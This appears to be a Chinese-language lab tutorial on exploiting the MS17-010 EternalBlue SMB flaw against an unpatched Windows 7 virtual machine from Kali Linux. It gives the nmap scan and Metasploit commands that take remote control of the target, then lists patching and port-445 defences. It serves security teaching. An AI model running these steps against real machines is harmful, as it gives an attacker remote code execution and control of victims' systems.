漏洞原理:利⽤ Windows SMB v1 协议的漏洞来获取系统的最高权限,⽆需⽤户交互即可远程执
⾏恶意代码,以此来控制被入侵的计算机。
关联端⼝:TCP 139 端⼝(NetBIOS 会话端⼝)、TCP 445 端⼝(SMB 直接连接端⼝)。
一、漏洞利⽤实验(Kali + Win7)
(1)实验环境
安装Kali Linux(攻击机),Windows 7(目标机),192.168.19.134(目标机ip地址) ,开启
SMB 服务,未安装 MS17-010 补丁,未修复永恒之蓝漏洞。
(2)漏洞查看操作步骤
漏洞扫描:打开kali通过 nmap 脚本检测⽬标是否存在 MS17-010 漏洞。
输入nmap sV -p445 --script=smb-vuln-ms17-010 192.168.19.134(目标机ip地址) ,回车,kali
开始扫描目标机是否存在漏洞。
出现英文看不懂时,可利用微信截图功能进行翻译,翻译后出现下图。
攻击目标主机前提条件:1、目标主机在线2、445端口开放3、永恒之蓝ms17-010漏洞存在。 通过
翻译后可以看到目标机存在SMB漏洞ms17-010。

(3)攻击流程
在kaili中输入指令msfconsole,回车,启动软件。

搜索漏洞名称,输入指令search ms17-010,回车
查看结果,看到本次操作可以攻击的计算机系统有win7、win8、win10p等,未出现windows 
server  2003,说明不可以对windows  server2003系统发起攻击。
出现永恒之蓝攻击的模块,输入use exploit/windows/smb/ms17_010_eternalblue或者输入要调用
的对应的攻击模块use 0。出现下图:
继续输入set rhosts 192.168.19.134(IP地址输入要攻击的目标机ip地址),回车,输入run运行,开启攻击。
表示对win7主机的攻击已成功,可以通过截屏指令(screenshot )等手段验证是否攻击成功。输
入截屏指令screenshot ,回车。
可以看到将截图结果保存在/home/kali文件中,点击kali进行查看。

漏洞影响与启示

MS17-010(永恒之蓝)作为Windows系统的经典漏洞,暴露出未及时更新补丁的系统面临的巨大风险。该漏洞通过SMB协议传播,攻击者可远程执行任意代码,导致大规模数据泄露、勒索软件感染等严重后果。

防范措施总结

定期更新系统补丁是防御此类漏洞的核心措施。关闭非必要的SMB服务、启用防火墙规则限制445端口访问,可有效降低攻击面。企业环境中,部署入侵检测系统(IDS)和终端防护软件能进一步提升安全性。

长期安全建议

网络安全需持续关注漏洞情报和威胁动态。建立完善的补丁管理流程,结合最小权限原则和网络分段策略,能显著减少类似漏洞的潜在影响。用户应避免使用已终止支持的操作系统版本,确保基础环境的安全性。

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐